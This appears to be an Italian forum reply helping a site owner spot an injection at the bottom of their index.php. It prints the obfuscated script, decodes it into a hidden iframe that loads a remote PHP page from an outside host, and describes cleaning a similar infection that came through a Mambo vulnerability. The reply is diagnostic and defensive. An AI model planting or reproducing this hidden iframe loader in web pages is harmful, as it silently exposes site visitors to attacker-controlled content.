Ciao,
guarda in fondo il tuo index.php.
C'è questo codice che sicuramente non hai messo tu:
<script language="javascript">
document.write( unescape( '%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%73%65%78%6F%6E%6C%69%6E%65%2E%65%6F%66%2E%68%75%2F%31%35%2F%6A%73%5F%67%6F%5F%66%31%2E%70%68%70%22%20%73%74%79%6C%65%3D%22%64%69%73%70%6C%61%79%3A%6E%6F%6E%65%22%3E%3C%2F%69%66%72%61%6D%65%3E' ) );
</script>Il codice è criptato e crea un iframe nella pagina:
<script language="javascript">
document.write( unescape( '<iframe src="http://sexonline.eof.hu/15/js_go_f1.php" style="display:none"></iframe>' ) );
</script>La decriptazione è stata fatta in questa pagina:
http://scriptasylum.com/tutorials/encdec/encode-decode.htmlMi sembra di aver incontrato qualcosa di simile un paio di anni fa in un sito fatto con mambo ed avevo risolto editando tutte le pagine a mano e facendo l'aggiornamento all'ultima versione disponibile, perchè l'iframe era stato inserito sfruttando una vulnerabilità di mambo che io ovviamente avevo sottovalutato.
Ciao
